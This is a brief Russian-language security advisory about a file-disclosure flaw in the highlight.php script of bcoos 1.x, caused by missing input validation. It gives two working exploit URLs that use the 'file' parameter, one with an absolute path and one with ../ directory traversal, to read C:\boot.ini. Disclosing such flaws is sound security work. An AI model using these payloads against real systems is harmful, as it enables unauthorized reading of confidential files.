Программа: bcoos 1.x

Уязвимость позволяет удаленному злоумышленнику получить несанкционированный
доступ к конфиденциальной информации на целевой системе. Уязвимость существует
из-за ошибки в проверке входных данных сценарием highlight.php. Атакующий может
получить несанкционированный доступ к конфиденциальной информации на целевой
системе.

Эксплоит:

http://localhost/bcoos/class/debug/highlight.php?file=C:\boot.ini

http://localhost/bcoos/class/debug/highlight.php?file=../../../../../boot.ini



Оставить мнение